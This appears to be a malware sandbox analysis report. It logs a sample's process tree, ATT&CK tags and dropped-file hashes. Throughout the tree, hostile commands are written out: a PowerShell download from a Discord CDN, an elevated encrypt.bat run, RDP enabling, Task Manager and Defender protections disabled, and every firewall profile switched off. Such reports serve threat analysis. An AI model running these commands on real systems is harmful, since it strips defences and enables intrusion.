C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"74⤵
- Blocklisted process makes network request
PID:1236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"74⤵
- Command and Scripting Interpreter: PowerShell
PID:2072 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"75⤵PID:4936
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"76⤵PID:1108
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f76⤵PID:3056
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"76⤵PID:3240
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f76⤵PID:3336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"76⤵PID:328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"76⤵PID:2508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"76⤵PID:1128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"76⤵PID:2908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"76⤵PID:3556
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable76⤵PID:204
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE76⤵PID:700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off76⤵PID:4244
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off76⤵PID:3064
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off76⤵PID:2072
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off76⤵
- Modifies Windows Firewall
PID:2684
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off76⤵PID:4756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"76⤵PID:1836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"76⤵PID:2848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"76⤵PID:444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"76⤵PID:1356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"76⤵PID:3412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"76⤵PID:3900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"76⤵PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"76⤵
- Command and Scripting Interpreter: PowerShell
PID:2148 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"77⤵PID:2928
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV178⤵PID:4884
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f76⤵PID:2744
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f74⤵
- Sets desktop wallpaper using registry
PID:4184
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters74⤵PID:3564
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f72⤵
- Sets desktop wallpaper using registry
PID:4436
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters72⤵PID:2488
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f70⤵
- Sets desktop wallpaper using registry
PID:4236
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters70⤵PID:1232
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f68⤵
- Sets desktop wallpaper using registry
PID:3036
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters68⤵PID:720
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f66⤵
- Sets desktop wallpaper using registry
PID:2872
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters66⤵PID:5036
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f64⤵
- Sets desktop wallpaper using registry
PID:5000
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters64⤵PID:3180
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f62⤵
- Sets desktop wallpaper using registry
PID:912
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters62⤵PID:4512
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f60⤵
- Sets desktop wallpaper using registry
PID:3088
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters60⤵PID:2672
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f58⤵
- Sets desktop wallpaper using registry
PID:4384
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters58⤵PID:4512
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f56⤵
- Sets desktop wallpaper using registry
PID:720
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters56⤵PID:4884
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f54⤵
- Sets desktop wallpaper using registry
PID:4444
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters54⤵PID:2012
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f52⤵
- Sets desktop wallpaper using registry
PID:620
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters52⤵PID:3524
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f50⤵
- Sets desktop wallpaper using registry
PID:2744
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters50⤵PID:4300
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f48⤵
- Sets desktop wallpaper using registry
PID:1532
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters48⤵PID:4084
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f46⤵
- Sets desktop wallpaper using registry
PID:4784
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters46⤵PID:3088
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f44⤵
- Sets desktop wallpaper using registry
PID:764
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters44⤵PID:3260
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f42⤵
- Sets desktop wallpaper using registry
PID:2912
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters42⤵PID:4904
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f40⤵
- Sets desktop wallpaper using registry
PID:4820
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters40⤵PID:3824
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f38⤵
- Sets desktop wallpaper using registry
PID:2212
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters38⤵PID:4152
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f36⤵
- Sets desktop wallpaper using registry
PID:2744
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters36⤵PID:1236
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f34⤵
- Sets desktop wallpaper using registry
PID:4856
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters34⤵PID:4512
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f32⤵
- Sets desktop wallpaper using registry
PID:2072
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters32⤵PID:792
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f30⤵
- Sets desktop wallpaper using registry
PID:2288
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters30⤵PID:1532
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f28⤵
- Sets desktop wallpaper using registry
PID:4180
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters28⤵PID:460
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f26⤵
- Sets desktop wallpaper using registry
PID:460
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters26⤵PID:528
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f24⤵
- Sets desktop wallpaper using registry
PID:2228
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters24⤵PID:2432
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f22⤵
- Sets desktop wallpaper using registry
PID:532
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters22⤵PID:2228
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f20⤵
- Sets desktop wallpaper using registry
PID:3340
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters20⤵PID:3856
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f18⤵
- Sets desktop wallpaper using registry
PID:3336
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters18⤵PID:2292
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f16⤵
- Sets desktop wallpaper using registry
PID:4152
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters16⤵PID:3540
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f14⤵
- Sets desktop wallpaper using registry
PID:2780
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters14⤵PID:2396
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f12⤵
- Sets desktop wallpaper using registry
PID:2264
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters12⤵PID:3008
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f10⤵
- Sets desktop wallpaper using registry
PID:4196
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters10⤵PID:1456
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f8⤵
- Sets desktop wallpaper using registry
PID:4284
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters8⤵PID:3240
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f6⤵
- Sets desktop wallpaper using registry
PID:2120
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters6⤵PID:620
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f4⤵
- Sets desktop wallpaper using registry
PID:4208
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:668
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4636
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3512
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:224
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1528
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:796
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:2772
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3256
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4456
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4856
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1276
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3640
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3524
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2220
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57a2773f461b2f4672ceb202de1104e08
SHA1cbcab3b011eddb0b5af6dcfee171511efc2bb9c3
SHA256522df7962a78dcec153baa5039c7cc119a0893fa247483fa0cddaf600ef9f695
SHA512df35de150f08cb8bba1910a6be86d7945cd44850b6e9e9ffd420643d1ad18b172325f9114aa0982ec9e148ba62b55b4d8c69236156c562a5a1c024fba0c3983b
-
Filesize
1KB
MD560722a327960e4b4f5d967101a72ed06
SHA104109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
SHA2563441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
SHA51298812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
74KB
MD5d4fc49dc14f63895d997fa4940f24378
SHA13efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a
-
Filesize
1KB
MD50648a1778be3a688ddfdc7ce413138ba
SHA1e07e38b4ac7af1b589cc39c9e563a8a25a1830d3
SHA2564f8ad8987762f761deacf05cd7caeb8d6a04a6cbb73ff66d6d2a33d6d2e2c578
SHA512f3e59f34e745a77ab31fb227294636ec6a3d27a21a0b4b863cb9b4804f89a2717ce13ba32a6ec11744010e9a4e8a8b09cf16743823167a55488157b22c45f1f5
-
Filesize
1KB
MD5cccdea27e371e720e3eb2f4d981e89f2
SHA13a498a0242d0b0b910140e27cccce65fbcd04d42
SHA256a0169768dd782490558bc9591662e75864d9ce0093186aa37d44a48a257ebb45
SHA51212f3af62274d1e8d99d575a6d3be6c9d74051e8a17fd60d3635470ca4de8ec697d7440d776317931d56985292d07dd605fc01e16d14c2ceca290a3cb827f2da0
-
Filesize
1KB
MD57ef4e2edd4b7175d2d0c5ce3a853d5bd
SHA16ce63dab1dfbaecd3d55fff5ba0a14012811bd71
SHA2564a6772292ad97cabfc8cba04dd30336a5c77ee196a288c6093a12ca3b9a575a0
SHA5128cc4d04c37457218969e46bbc08a6c8b37667b8f98e22804e1fe554de94427730270550d0d1009af818dae836afe6cc88106bcbd7a353ae3544b58a40d13cad6
-
Filesize
1KB
MD5a2511542ae14a9d12f93cda64f51a713
SHA149fc36d8085b1a87db8bd766291c975b8903b359
SHA25629a1f7ff523730f432b1cb2582cde6d683e0d7c9cccaa59f5d4b57c224c3a181
SHA512541caa6f6495f8d3b4e766dcb08a0aeae1966444c910e0912d0581685643b9ae9e986c1a55871e04fabe3ad75ffaddf45103bc94231bfe9b2ffe24adab50973d
-
Filesize
1KB
MD55325bcc5859819b6dd0c7ea3f65d1531
SHA100d75bb331ee69fb152059bfa80feeb281446a60
SHA256ec1eb5d62a3d3acea7a70a5811517e8fe2bfb8160d2fc6abe4eb48d4289102b9
SHA512e9d61174840c14fbe517f32aa1bfe763e6e6205db64e16e633ec45bae5fe0fc979759ec3f8473d7b9994a8fbc02f80981930917fc3c424032a97d6a879c3ade8
-
Filesize
1KB
MD53eba7760ed4775664f664da98f29b4f0
SHA16b1e848b6d5b89b2bdda16ccf4382e28ea7679ff
SHA25687ab3b350a5da6e1441e16a3de88b3d1eb7165cd87e6bf237ec78841e46c917a
SHA512cc54bde3f5a46e021fed2390e436d726b9a8743c36316cb55bba6a22d6957bd96b19ae871df7f60a768790b57da20ef2e7f764ed6614963448167ee5dce59c85
-
Filesize
1KB
MD51449295cfd039bc3e1a8947ade2fc174
SHA1b2ee665df758dc9af660d6ebafba1831e1581ed3
SHA256c093bf7eb0045e7c6dda574725aa8885a605c86dd075ce9d94c93f134327f776
SHA51275f49d501052e7b5386c40f5293ed2ddfd7a8a0bd3abde195308d7711fea97968dcf2c13336841ae67b44a7205649e48991cef8ec80f385f2383fcb3d68bcbad
-
Filesize
1KB
MD57bc36834b9ac52abc5c95ffa952b1c49
SHA1c4cb1c1b2fa12499bcc078ebca5a9f6e1c5c8cdf
SHA256d5a4fa9b42c9b5874c496feb99bcef9ad6853cdd89a676dfd21becec69395a72
SHA512b2afccebb72daa1f8783b8860d61aa7344822eae0e6ca837b71d4f6b61d2b828e066902340fa81a9d44cf19dabfa8eefb4eb870ecc2e9a32fcf4f31d6d19d7dc
-
Filesize
1KB
MD58f3691d4e4311bb9a25b98a31a4af3ea
SHA1d4a18d7b3f3b613839e903cae1446eef1d1cca8c
SHA256dbb662a2c8d82f0cd1068d0fb75d3788b79066f049c5bfe63d46b0f11e5c3efc
SHA512e612712ee4aa8f29fa9e052e01f130c12b3d7a243674f7c2e5837d9a6710ba5be355d55211560bda4838d8712aa4188f0de207768c5a953b9f5ede3cb320384d
-
Filesize
1KB
MD53ea75298634899c0575b7a9296f0566d
SHA1e26cd5540a38661636034f70a5579f27b9332672
SHA25641538f75a9ce8c1e8a2602227d59957818e748945b7f123fc4297505e23cf69e
SHA512873885fa963d54ac71b9718a4638ebf0e21f5b3e3700715a368ed8a909a053883cd4f5c7237af0534d81b74de6e7f3fa5127c98236d0314e548e70d3612f4d21
-
Filesize
1KB
MD5221ea62a3483545edfd6c95836d213b2
SHA1c3f3c5333723cfe7943c7b25a9c4ace10fc12837
SHA256404ed9e7ec4e647f77f287c154a4cf1f832221d4a32ed234abfe5a6f639faacb
SHA512e3f9c90825479b98aae1e90a781b47563eed4a0d50c2134f6be91716bc933e06197372a1d15b60993b06eb0ff81e4dcb22690c1363474772c63ef3471b119e77
-
Filesize
1KB
MD5558f8f63df3e0e60a901729df3744a1f
SHA19ce05f615f1555f0d74a4f53d4241a1a8cb748b6
SHA256f41783acc666fc9ca785a2fdefa56e71d886cacb3ab57e4708a87d41c4d69804
SHA5126d1b431c6fd1be7f0eec2b81a86b9ff65bfa1040ef05e64a86ef0e04cd6458d7305dba20c80a43e4b02131db592f57f45fc1439c9783aa42f1d63117e656170e
-
Filesize
1KB
MD574bef0d68b005c46184b581a43dd1928
SHA17711ba3804b7fcfe0ded3b6aebffd16672690344
SHA25620b254c404421017f1c2e61b4bcd8f8561bb324170f95ce9431159abd79cab65
SHA5125f05e90ab44624203b727d1238ea739293e95dd3dc438542d9d414bf03c97e824a3631e9ed717c2ffacc6f6aa968785fd0d4e820acf0d240009da77a9e869722
-
Filesize
1KB
MD5a34142a0a75ce7f697ccbe8d76b49b1a
SHA1cf3de9271fdb8215e7fd11b052107fe95c12c2e5
SHA25641d0083611fdfefe3d2576fc1018bd23826955fe9a7211f842f7a9022085b4e2
SHA512c64c5618fcce50cd2b620376e3b4784a84b467c3de7ebf73b2fd88ecb9f9cc81073182c9a78384db9dc0218434d0b08f6ee6e81359898db2964304eebaa6b39d
-
Filesize
1KB
MD57349175b03f7b4dffe32e246915c0cbc
SHA15cfae23b43de8fd31513e007723cc33720204749
SHA2566211da309c8c5ba1c6d3c0f97d734b1cb443d1a6d101fe6299a4cc2e87c8d944
SHA512b43bb7c01323665c2e29b5d13ddbe4400d5bd96abceb66923be378281eeb1498d42af400c5bdc66258f6fb37eb710077b4a66107bbe223584248fbe142a8f2be
-
Filesize
1KB
MD5ae1dc62b6d0dbf25952cab139b50d7bd
SHA1f303586a69666b8e8b73129ff3a5f9412ebe671e
SHA256af2681b4fa5920044879b14f03afb7479a2166b548d9bc46c959dc836be99844
SHA5123eda84e1d78d426ce01d5ca5c7233d2638fcbdbff0587367ef8dc64dd1748db6880e2cf8ede1d33f767d1dab78044d5cd2e82efcd2c6cf310a5dd766264f5578
-
Filesize
1KB
MD58d78da699a0c7348866b0cccbe8ff511
SHA1616f5238b83162c6813f592c996cf6fee470d67f
SHA2567b84b8c6b0cad136f87a35c402922a75b65ac2d4ade1ad9942564db2a99eea7f
SHA512026d3bedac9783e2bae9b8560497440449799dea7ac40089d15d705da81afd8542d61d176d9a3e574c20c1413d07fa5c19a931399c15e11caed23813b0b9aa0d
-
Filesize
1KB
MD5ef6427d74f16635742e3ea58083e4ce9
SHA1644064369e4b7b5986cfcc5fc1bfe580c7eaba3f
SHA256244ce4a9621c470ba48e57d40b42806cee6e3c8e365660a9f6ef8c5ced40ed7c
